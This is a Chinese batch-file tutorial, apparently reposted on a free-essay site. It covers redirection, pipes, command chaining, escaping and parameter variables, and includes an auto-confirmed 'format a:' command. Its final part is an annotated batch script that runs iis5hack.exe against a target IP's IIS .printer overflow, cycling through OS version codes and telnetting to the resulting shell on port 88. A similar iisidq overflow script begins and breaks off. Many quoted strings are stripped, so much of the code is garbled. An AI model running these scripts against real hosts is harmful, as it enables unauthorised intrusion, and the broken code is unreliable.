bat批处理命令大全1(2)

2003-04-04 17:02 5 1.txt 2003-03-12 11:43 0 aierrorlog.txt 2003-03-30 00:35 30,571 202.108.txt 5 个文件 18,630,070 字节 0 个目录 1,191,542,784 可用字节 >将命令执行的结果覆盖了原始的文件内容。

在传递给控制台的时候程序将不会有任何回显（注意：这里的回显跟echo off关掉的回显不是同一概念。Echo off关掉的是输入命令的回显，这里的回显是程序执行中或后的回显）例： C:\\>dir *.txt >nul

程序将没有任何显示也不会产生任何痕迹。 3、 符号(>>)

符号>>的作用与符号>相似，但他们的区别在于>>是传递并在文件末尾追加>>也可将回显传递给控制台（用法同上）例： 文件1.txt内同为： 1+1

使用命令c:\\>dir *.txt >>1.txt 这时候1.txt的内容如下 1+1

驱动器 C 中的卷没有标签。 卷的序列号是 301A-1508 C:\\ 的目录

2003-03-11 14:04 1,005 FRUNLOG.TXT 2003-04-04 16:38 18,598,494 log.txt 2003-04-04 17:02 5 1.txt 2003-03-12 11:43 0 aierrorlog.txt 2003-03-30 00:35 30,571 202.108.txt 5 个文件 18,630,070 字节 0 个目录 1,191,542,784 可用字节 >>将命令执行的结果覆加在了原始的文件内容后面。 4、 符号(|)

|是一个管道传输命令意思是将上一命令执行的结果传递给下一命令去处理。例： C:\\>dir c:\\|find \卷的序列号是 301A-1508

以上命令的意思为查找c:\\的所有并发现1508字符串。Find的用法请用 find /?自行查看 在不使用format的自动格式化参数的时候我是这样来自动格式化盘片的 echo y|fornat a: /s /q /v:system

用过format命令的人都知道format有一个交互对化过程，要使用者输入y来确定当前的命令是否被执行。在这个命令前加上echo y并用管道传输符|将echo执行的结果y传递给format从而达到手工输入y的目的（这条命令有危害性，测试的时候请谨慎） 5、 符号(^)

^ 是对特殊符号 > 、<、 &、的前导字符。在命令中他将以上的3个符号的特殊动能去掉仅仅只吧他们当成符号而不使用他们的特殊意义。例： c:\\>echo test ^> 1.txt test > 1.txt

从上面可以看出并没有把test写入文件1.txt而是将test >1.txt 当字符串显示了出来。这个符号在远程构建批处理的时候很有效果。 6、 符号(&)

&符号允许在一行中使用2个以上不同的命令，当第一个命令执行失败将不影响第2个命令的执行。例： c:\\> dir z:\\ &dir y:\\ &dir c:\\

以上的命令将会连续显示z: y: c:盘内的内容不理会该盘符是否存在。 7、 符号(&&)

&&符号也是允许在一行中使用2个以上不同的命令，当第一个命令执行失败后后续的命令将不会再被执行。例：

c:\\> dir z:\\ &&dir y:\\ &&dir c:\\

以上的命令将会提示检查是否存在z:盘如果存在则执行，如果不存在则停止执行所有的后续命令 8、 符号(\

\符号允许在字符串中包含空格。进入一个特殊的目录可以用如下方法例: c:\\>cd “Program Files” c:\\>cd progra~1 c:\\>cd pro*

以上方法都可以进入Program Files目录 9、 符号（,）

,符号相当于空格。在某些特殊的情况下可以用,来代替空格使用。例： c:\\>dir,c:\\

10、 符号(;)

;符号当命令相同的时候可以将不同的目标用;隔离开来但执行效果不变。如执行过程中发生错误则只返回错误报告但程序还是会继续执行。例： DIR C:\\;D:\\;E:\\F:\\ 以上的命令相当于 DIR C:\\ DIR D:\\ DIR E:\\ DIR F:\\

当然还有些特殊的符号但他们的使用范围很小我就不再这里一一的说明了。

批处理命令大全（三）第三部分：批处理与变量

在批处理中适当的引用变量将会使你所编制的程序应用面更广。批处理每次能处理的变量从%0~%9共10个。其中%0默认给批处理的文件名使用。除非在使用SHIFT命令后%0才能被%1所替代。引用shift命令的例子如果把%1前面多加上一个%0那么结果如下： C::\\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11 SHIFT.BAT 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 10 2 3 4 5 6 7 8 9 10 11

系统是如何区分每个变量的呢，系统区分变量的规则为字符串中间的空格，即只要发现空格就把空格前面的字符当作一个变量而空格后面的字符则作为另一个变量。如果你的变量是一个当中包含空格的长目录名这时候你需要用上一节特殊符号8中所用的引号将他圈起来。例： 批处理内容为：

ECHO %1 ECHO %2 ECHO %3 输入命令：

C:\\>TEST “Program Files” Program Files Program Files Program Files

在一个复杂的批处理中又可能同时使用的变量会超过10个这时候会和系统的规则想冲突那么这个问题怎么解决呢？在系统中还有一种变量称之为环境变量（使用SET命令可以查看当前系统的环境变量）如当前系统目录是%windir%或%SystemRoot%等。当同时使用的参数超过10个的时候，我们可以把某些在后面的程序中还要调用的变量保存为环境变量。具体用法如 SET A=%1 这样我们就命名了一个新的环境变量A 在调用变量A的时候要%A%这样调用，环境变量不受SHIFT命令影响。如果要改变一个环境变量需要重新对其设置才能改变。当然也可以进行变量与变量之间的传递来达到目的。下面我们来看一个例子，批处理如下： ECHO OFF SET PASS=%1 SHIFT

SET PASS1=%1 SHIFT

ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9 SHIFT

ECHO %PASS% %PASS1% %9

SET PASS=%PASS1% 变量的传递 SET PASS1=%9 SHIFT

ECHO %PASS% %PASS1% %9

使用命令：C:\\>TEST A B 3 4 5 6 7 8 9 10 K L A B 3 4 5 6 7 8 9 10 K 注意：这一行显示了11个变量 A B L 在使用了3次SHIFT之后%9变成了L B L 变量的传递后的结果

批处理命令大全（四）第四部分：完整案例

以上就是批处理的一些用法。现在我们把这些用法结合起来详细的分析一下目前网上发布的一些批处理，看看他们是怎么运作的。这里我将列举三个例子来详细分析，为了保持程序的完整我的注释会加在/*后面。 例一

这个例子是利用iis5hack.exe对有.printer漏洞的主机进行溢出的批处理。用到的程序有iis5hack.exe和系统自带的telnet.exe。iis5hack的命令格式为：

iis5hack <目标ip> <目标端口> <目标版本> <溢出连接端口>目标版本为0-9这10个数字分别对应不同语言版本和sp的系统版本，我们编制的批处理使用的命令格式为 开始版本号可有可无。程序如下。 @echo off /*关闭命令回显

if \ /*判断%1是否为空，%1为目标ip if \ /*判断%2是否为1，为1则跳转标志1

if \ /*%2为开始版本号，如果没有设置则 if \ /*如果存在则从匹配的地方开始执行 if \if \if \if \if \

if not EXIST iis5hack.exe goto file /*没有发现iis5hack.exe就执行标志file段内容 ping %1 -n 1 | find \目标1次，从结果中发现Received = 1

if errorlevel 1 goto error /*如果返回代码为1则执行error段(代码1为没有发现 0为发现并成功执行)

iis5hack %1 80 9 88 | find \开始溢出目标端口80 系统代码9 溢出后连接端口88 在执行结果中发现字符串”good”(溢出成功后才会有字符串good)

if not errorlevel 1 goto telnet /*如果没有错误代码1（溢出成功）就执行telnet段的内容。 echo 操作系统类型 9 失败! /否则显示这一句 :8 /*以下代码内容参照上面 iis5hack %1 80 8 88 | find \if not errorlevel 1 goto telnet echo 操作系统类型 8 失败! :7

iis5hack %1 80 7 88 | find \if not errorlevel 1 goto telnet echo 操作系统类型 7 失败! :6

iis5hack %1 80 6 88 | find \if not errorlevel 1 goto telnet echo 操作系统类型 6 失败! :5

iis5hack %1 80 5 88 | find \if not errorlevel 1 goto telnet echo 操作系统类型 5 失败! :4

iis5hack %1 80 4 88 | find \if not errorlevel 1 goto telnet echo 操作系统类型 4 失败! :3

iis5hack %1 80 3 88 | find \if not errorlevel 1 goto telnet echo 操作系统类型 3 失败! :2

iis5hack %1 80 2 88 | find \if not errorlevel 1 goto telnet echo 操作系统类型 2 失败! :1

iis5hack %1 80 1 88 | find \if not errorlevel 1 goto telnet echo 操作系统类型 1 失败! :0

iis5hack %1 80 0 88 | find \if not errorlevel 1 goto telnet echo 操作系统类型 0 失败! goto error :telnet

telnet %1 88 /*开始连接目标ip的88端口 goto exit /*连接中断后跳转exit段 :error /*error段显示错误后的帮助信息

echo 可能网络不能连接或者对方以修补该漏洞!请按照下面的格式手工尝试一次! echo iis5hack [目标IP] [WEB端口] [系统类型] [开放端口] ECHO 中文: 0 ECHO 中文+sp1: 1 ECHO 英文: 2 ECHO 英文+sp1: 3 ECHO 日语: 4 ECHO 日语+sp1: 5 ECHO 韩文: 6 ECHO 韩文+sp1: 7 ECHO 墨西哥语: 8 ECHO 墨西哥语+sp1: 9 goto exit /*跳转exit段

:file /*file段显示文件没有发现的信息 echo 文件iis5hack.exe没有发现!程序终止运行! goto exit /*跳转exit段

:help /*help段显示本批处理的使用格式帮助 echo 本程序用法如下: echo iis [目标ip]

echo iis [目标ip] [开始的号码9-0] :exit /*exit段为程序出口

这个批处理基本没有什么循环只是一路走下来。所以代码比较长难度不大！ 例二

这个例子是用iisidq.exe对有idq漏洞的机器进行溢出的批处理。使用的程序有iisidq.exe和系统自带的程序telnet.exe。iisidq.exe的用法如下：

运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1> 其中,如果输入命令参数没有输入,那么,默认为:\。

其中操作系统类型类型的代码范围是0-14。我们编制的批处理使用的命令格式为 程序如下： @echo off /*同例一

if not EXIST iisidq.exe goto file /*同例一 if %1 == \ /*同例一 ping %1 -n 1 | find \ /*同例一

百度搜索“77cn”或“免费范文网”即可找到本站免费阅读全部范文。收藏本站方便下次阅读，免费范文网，提供经典小说综合文库bat批处理命令大全1(2)在线全文阅读。